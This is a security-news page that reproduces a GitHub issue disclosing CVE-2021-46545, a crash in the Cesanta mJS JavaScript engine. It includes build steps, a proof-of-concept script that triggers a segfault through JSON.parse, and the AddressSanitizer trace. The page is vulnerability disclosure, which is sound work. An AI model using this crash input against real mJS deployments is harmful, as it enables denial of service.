Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46545: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x4b44b) · Issue #218 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /lib/x86_64-linux-gnu/libc.so.6+0x4b44b. This vulnerability can lead to a Denial of Service (DoS).

CVE
Open in Source
#vulnerability#ubuntu#linux#dos#js

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

function getImmutableArrayOrSet(get, value) {
    ({
        e: "[object " + "Array",
        e: JSON.stringify({
            e: 1,
            f: 2
        })
    })
}
function JSEtest() {
    getImmutableArrayOrSet(true);
    for (let i = 0; i < 2; ([
        JSON.parse(
            '192.015052000001'
        ),

    ])) {
        getImmutableArrayOrSet(false, {});
    }
    let arr = getImmutableArrayOrSet(true);
}
JSEtest();

Execution steps & Output

$ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==62116==ERROR: AddressSanitizer: SEGV on unknown address 0x602000010000 (pc 0x7f9a89e6444c bp 0x60200000fff0 sp 0x7fff400ffd90 T0) ==62116==The signal is caused by a READ memory access. #0 0x7f9a89e6444b (/lib/x86_64-linux-gnu/libc.so.6+0x4b44b) #1 0x55ca33043e4a in frozen_cb src/mjs_json.c:360 #2 0x55ca33122876 in json_parse_number src/frozen/frozen.c:288 #3 0x55ca33122876 in json_parse_value src/frozen/frozen.c:374 #4 0x55ca33134337 in json_doit src/frozen/frozen.c:434 #5 0x55ca33134337 in json_walk src/frozen/frozen.c:815 #6 0x55ca33050873 in mjs_json_parse src/mjs_json.c:450 #7 0x55ca33056722 in mjs_op_json_parse src/mjs_json.c:510 #8 0x55ca33010244 in mjs_execute src/mjs_exec.c:853 #9 0x55ca33019a05 in mjs_exec_internal src/mjs_exec.c:1073 #10 0x55ca33019a05 in mjs_exec_file src/mjs_exec.c:1096 #11 0x55ca32fd6909 in main src/mjs_main.c:47 #12 0x7f9a89e3ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #13 0x55ca32fd7449 in _start (/usr/local/bin/mjs+0xe449)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x4b44b) ==62116==ABORTING

Credits: Found by OWL337 team.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE